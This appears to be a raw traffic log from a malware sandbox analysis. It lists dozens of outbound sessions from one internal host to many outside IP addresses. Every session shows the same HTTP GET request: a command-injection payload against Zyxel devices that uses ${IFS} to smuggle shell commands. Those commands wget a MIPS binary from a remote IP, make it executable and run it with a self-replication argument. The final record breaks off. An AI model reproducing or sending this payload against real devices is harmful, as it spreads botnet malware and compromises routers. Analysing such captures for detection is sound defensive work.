                                                      Feb 2, 2024 06:35:41.383065939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1648192.168.2.1454742103.242.53.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383099079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1649192.168.2.144781069.111.213.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383121014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1650192.168.2.1439708219.234.143.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383158922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1651192.168.2.145178099.89.200.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383184910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1652192.168.2.1449072211.67.220.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383239031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1653192.168.2.1437522129.109.61.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383270025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1654192.168.2.143425460.122.155.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383302927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1655192.168.2.144873034.151.145.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383383989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1656192.168.2.1439520218.213.234.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383400917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1657192.168.2.1450756137.150.184.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383423090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1658192.168.2.144337464.18.142.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383450985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1659192.168.2.1459590102.238.18.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383502007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1660192.168.2.1439456171.117.243.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383543015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1661192.168.2.14488349.10.213.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383579016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1662192.168.2.1439584162.108.185.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383605957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1663192.168.2.1442526222.203.23.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383687019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1664192.168.2.143403497.111.225.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383687973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1665192.168.2.1459342189.43.100.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383748055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1666192.168.2.1453200178.52.243.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383774042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1667192.168.2.1440824173.62.59.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383842945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1668192.168.2.145189471.186.203.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383861065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1669192.168.2.1444964177.245.75.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383889914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1670192.168.2.1459352223.10.237.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.383919001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1671192.168.2.1439766128.44.195.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.384397984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1672192.168.2.143720873.115.19.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.384984016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1673192.168.2.145173017.56.248.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.385226965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1674192.168.2.1453580203.221.104.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.385272980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1675192.168.2.1440560144.63.146.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.385677099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1676192.168.2.145861020.155.141.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.387398958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1677192.168.2.1450062115.173.26.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397017956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1678192.168.2.1452604115.102.93.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397067070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1679192.168.2.145172841.192.89.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397097111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1680192.168.2.145193291.147.47.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397147894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1681192.168.2.145170494.87.88.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397177935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1682192.168.2.144089298.21.126.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397233963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1683192.168.2.144020457.0.16.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397274971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1684192.168.2.144574692.76.231.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397320986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1685192.168.2.144950449.200.236.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397347927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1686192.168.2.143615295.190.220.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397388935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1687192.168.2.1459964154.21.201.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397425890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1688192.168.2.146095672.251.117.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397459030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1689192.168.2.1439464196.137.175.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397509098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1690192.168.2.1434338205.244.45.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397564888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1691192.168.2.143280651.41.156.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397597075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1692192.168.2.1438070222.14.127.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397640944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1693192.168.2.144673253.82.209.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397675991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1694192.168.2.1456284177.47.106.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397733927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1695192.168.2.1433924167.170.171.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397764921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1696192.168.2.1457556164.248.217.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397818089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1697192.168.2.1447176113.106.87.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397839069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1698192.168.2.144836684.230.221.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397897005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1699192.168.2.144107637.33.102.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397922039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1700192.168.2.144372012.213.60.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.397948027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1701192.168.2.144660662.122.85.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398010015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1702192.168.2.143591470.105.226.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398036957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1703192.168.2.1436294121.209.190.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398097038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1704192.168.2.1442632213.174.102.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398121119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1705192.168.2.1436240117.161.158.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398168087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1706192.168.2.1442010112.235.180.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398214102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1707192.168.2.1458658147.244.221.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398252010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1708192.168.2.1442852134.227.94.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398287058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1709192.168.2.1441426120.9.134.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.398375034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1710192.168.2.145960239.80.222.218443
                                                      TimestampBytes transferredDirectionData
